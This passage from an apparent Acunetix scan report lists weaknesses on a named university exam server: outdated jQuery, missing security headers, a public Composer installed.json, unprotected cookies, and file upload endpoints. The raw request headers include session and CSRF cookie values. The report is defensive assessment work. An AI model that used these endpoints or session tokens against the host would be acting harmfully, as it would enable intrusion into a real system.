that were reported.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

24
Affected items

Web Server
Verified vulnerability
Details

jQuery 3.2.1
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js
Detection method: The library's name and version were determined based on the file's name, and contents.
Acunetix verified the library version and the associated vulnerabilities with the file's unique syntax fingerprint,
which matched the syntax fingerprint expected by Acunetix.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/

Request headers
GET /assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Verified vulnerability
Details

25
jQuery 3.3.1
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/jquery/jquery-3.3.1.min.js
Detection method: The library's name and version were determined based on the file's name, and contents.
Acunetix verified the library version and the associated vulnerabilities with the file's unique syntax fingerprint,
which matched the syntax fingerprint expected by Acunetix.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/

Request headers
GET /assets/bower_components/jquery/jquery-3.3.1.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Clickjacking: X-Frame-Options header

Severity Low
Reported by module /httpdata/X_Frame_Options_not_implemented.js

Description

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user
into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential
information or taking control of their computer while clicking on seemingly innocuous web pages.

The server did not return an X-Frame-Options header with the value DENY or SAMEORIGIN, which means that this
website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate
whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid
clickjacking attacks, by ensuring that their content is not embedded into untrusted sites.

Impact

26
The impact depends on the affected web application.

Recommendation

Configure your web server to include an X-Frame-Options header and a CSP header with frame-ancestors directive.
Consult Web references for more information about the possible values for this header.

References

The X-Frame-Options response header (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options)


Clickjacking (https://en.wikipedia.org/wiki/Clickjacking)
OWASP Clickjacking (https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)
Frame Buster Buster (https://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed)

Affected items

Web Server
Details

27
Paths without secure XFO header:

http://dev-ubk.polindra.ac.id/auth

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

http://dev-ubk.polindra.ac.id/dashboard/

http://dev-ubk.polindra.ac.id/users/edit/1

http://dev-ubk.polindra.ac.id/dosen

http://dev-ubk.polindra.ac.id/hasilujian

http://dev-ubk.polindra.ac.id/ujian/master

http://dev-ubk.polindra.ac.id/jurusan

http://dev-ubk.polindra.ac.id/jurusan/add

http://dev-ubk.polindra.ac.id/kelas

http://dev-ubk.polindra.ac.id/kelasdosen

http://dev-ubk.polindra.ac.id/kelas/add

http://dev-ubk.polindra.ac.id/mahasiswa

http://dev-ubk.polindra.ac.id/settings

http://dev-ubk.polindra.ac.id/soal

http://dev-ubk.polindra.ac.id/mahasiswa/import

http://dev-ubk.polindra.ac.id/mahasiswa/preview

http://dev-ubk.polindra.ac.id/users

http://dev-ubk.polindra.ac.id/kelasdosen/add

http://dev-ubk.polindra.ac.id/dosen/

http://dev-ubk.polindra.ac.id/settings/

Request headers

28
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Composer installed.json publicly accessible

Severity Low
Reported by module /location/composer_installed_json.js

Description

A installed.json file was discovered. Composer is a tool for dependency management in PHP. It allows you to declare the
libraries your project depends on and it will manage (install/update) them for you. After installing the dependencies,
Composer stores the list of them in a special file for internal purposes.

As the file is publicly accessible, it leads to disclosure of information about components used by the web application.

Impact

installed.json discloses sensitive information. This information can be used to launch further attacks.

Recommendation

Restrict access to vendors directory

References

Composer Basic usage (https://getcomposer.org/doc/01-basic-usage.md)

Affected items

Web Server

29
Details

Request headers
GET /vendor/composer/installed.json HTTP/1.1

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Cookies with missing, inconsistent or contradictory properties

Severity Low
Reported by module /RPA/Cookie_Validator.js

Description

At least one of the following cookies properties causes the cookie to be invalid or incompatible with either a different
property of the same cookie, of with the environment the cookie is being used in. Although this is not a vulnerability in itself,
it will likely lead to unexpected behavior by the application, which in turn may cause secondary security issues.

Impact

Cookies will not be stored, or submitted, by web browsers.

Recommendation

Ensure that the cookies configuration complies with the applicable standards.

References

MDN | Set-Cookie (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie)


Securing cookies with cookie prefixes (https://www.sjoerdlangkemper.nl/2017/02/09/cookie-prefixes/)
Cookies: HTTP State Management Mechanism (https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-05)
SameSite Updates - The Chromium Projects (https://www.chromium.org/updates/same-site)
draft-west-first-party-cookies-07: Same-site Cookies (https://tools.ietf.org/html/draft-west-first-party-cookies-07)

Affected items

Web Server
Verified vulnerability
Details
List of cookies with missing, inconsistent or contradictory properties:

30
http://dev-ubk.polindra.ac.id/auth

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk; expires=Sat, 29-Jul-2023 18:

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

31
http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

Cookie was set with:

Set-Cookie: ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk; expires=Sat, 29-Jul-2023 18:

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=2d66993bb3924e6856ee6a1358910e71; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: ci_session=mfrdm65a50e2oi5ft3ag0cjavit27d1m; expires=Sat, 29-Jul-2023 18:

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/index.php

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

32
http://dev-ubk.polindra.ac.id/

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/index.php

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/edit/1

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

33
http://dev-ubk.polindra.ac.id/dashboard/

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/edit_info

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/change_password

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dosen

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/hasilujian

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

34
http://dev-ubk.polindra.ac.id/ujian/master

Cookie was set with:

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.


When cookies lack the SameSite attribute, Web browsers may apply different and sometim

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Cookies without HttpOnly flag set

Severity Low
Reported by module /RPA/Cookie_Without_HttpOnly.js

Description

One or more cookies don't have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser
that the cookie can only be accessed by the server and not by client-side scripts. This is an important security protection for
session cookies.

Impact

Cookies can be accessed by client-side scripts.

35
Recommendation

If possible, you should set the HttpOnly flag for these cookies.

Affected items

Web Server
Verified vulnerability
Details
Cookies without HttpOnly flag set:

http://dev-ubk.polindra.ac.id/auth

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=2d66993bb3924e6856ee6a1358910e71; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/index.php

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

36
http://dev-ubk.polindra.ac.id/index.php

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/users/edit/1

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/users/edit_info

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/users/change_password

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dosen

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/hasilujian

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/ujian/master

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/jurusan

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/jurusan/add

37
Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

http://dev-ubk.polindra.ac.id/dosen/delete

Set-Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; expires=Sat, 29-Jul-20

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Content Security Policy (CSP) not implemented

Severity Informational
Reported by module /httpdata/CSP_not_implemented.js

Description

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.

Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for the all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as from the jQuery library from their CDN, the CSP
header could look like the following:

38
Content-Security-Policy:

default-src 'self';

script-src 'self' https://code.jquery.com;

It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.

Impact

CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.

Recommendation

It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.

References

Content Security Policy (CSP) (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)


Implementing Content Security Policy (https://hacks.mozilla.org/2016/02/implementing-content-security-policy/)

Affected items

Web Server
Details

39
Paths without CSP header:

http://dev-ubk.polindra.ac.id/auth

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

http://dev-ubk.polindra.ac.id/dashboard/

http://dev-ubk.polindra.ac.id/users/edit/1

http://dev-ubk.polindra.ac.id/dosen

http://dev-ubk.polindra.ac.id/hasilujian

http://dev-ubk.polindra.ac.id/ujian/master

http://dev-ubk.polindra.ac.id/jurusan

http://dev-ubk.polindra.ac.id/kelas

http://dev-ubk.polindra.ac.id/kelasdosen

http://dev-ubk.polindra.ac.id/mahasiswa

http://dev-ubk.polindra.ac.id/settings

http://dev-ubk.polindra.ac.id/soal

http://dev-ubk.polindra.ac.id/mahasiswa/import

http://dev-ubk.polindra.ac.id/users

http://dev-ubk.polindra.ac.id/kelasdosen/add

http://dev-ubk.polindra.ac.id/dosen/

http://dev-ubk.polindra.ac.id/settings/

http://dev-ubk.polindra.ac.id/soal/

http://dev-ubk.polindra.ac.id/jurusan/

http://dev-ubk.polindra.ac.id/kelas/

Request headers

40
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Content type is not specified

Severity Informational
Reported by module /RPA/Content_Type_Missing.js

Description

These page(s) does not set a Content-Type header value. This value informs the browser what kind of data to expect. If
this header is missing, the browser may incorrectly handle the data. This could lead to security problems.

Impact

None

Recommendation

Set a Content-Type header value for these page(s).

Affected items

Web Server
Verified vulnerability
Details
Pages where the content-type header is not specified:

http://dev-ubk.polindra.ac.id/composer.lock

41
Request headers
GET /composer.lock HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

File uploads

Severity Informational
Reported by module /Crawler/12-Crawler_File_Upload.js

Description

These pages allows visitors to upload files to the server. Various web applications allow users to upload files (such as
pictures, images, sounds, ...). Uploaded files may pose a significant risk if not handled correctly. A remote attacker could
send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Impact

If the uploaded files are not safely checked an attacker may upload malicious files.

Recommendation

Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist
approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like
.htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the
files within it are not executable. If possible, rename the files that are uploaded.

Affected items

Web Server
Details

42
Pages with file upload forms:

http://dev-ubk.polindra.ac.id/mahasiswa/import

Form name: <empty>


Form action: http://dev-ubk.polindra.ac.id/mahasiswa/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/soal/import

Form name: <empty>


Form action: http://dev-ubk.polindra.ac.id/soal/preview/soal
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/dosen/import

Form name: <empty>


Form action: http://dev-ubk.polindra.ac.id/dosen/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/jurusan/import

Form name: <empty>


Form action: http://dev-ubk.polindra.ac.id/jurusan/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/kelas/import

Form name: <empty>


Form action: http://dev-ubk.polindra.ac.id/kelas/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/soal/add

Form name: <empty>


Form action: http://dev-ubk.polindra.ac.id/soal/save
Form method: POST
Form file input: file_soal [file]

Request headers

43
GET /mahasiswa/import HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/mahasiswa

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

No HTTP Redirection

Severity Informational
Reported by module /target/http_redirections.js

Description

It was detected that your web application uses HTTP protocol, but doesn't automatically redirect users to HTTPS.

Impact

In some circumstances, it could be used for a man-in-the-middle (MitM) attack

Recommendation

It's recommended to implement best practices of HTTP Redirection into your web application. Consult web references for
more information

References

HTTP Redirections (https://infosec.mozilla.org/guidelines/web_security#http-redirections)

Affected items

Web Server
Details

Request headers

44
GET / HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Outdated JavaScript libraries

Severity Informational
Reported by module /Scripts/PerFile/Javascript_Libraries_Audit.script

Description

You are using an outdated version of one or more JavaScript libraries. A more recent version is available. Although your
version was not found to be affected by any security vulnerabilities, it is recommended to keep libraries up to date.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

Affected items

Web Server
Details

bootstrap.js 3.3.7
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/js/bootstrap.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/twbs/bootstrap/releases

Request headers

45
GET /assets/bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

Select2 4.0.3
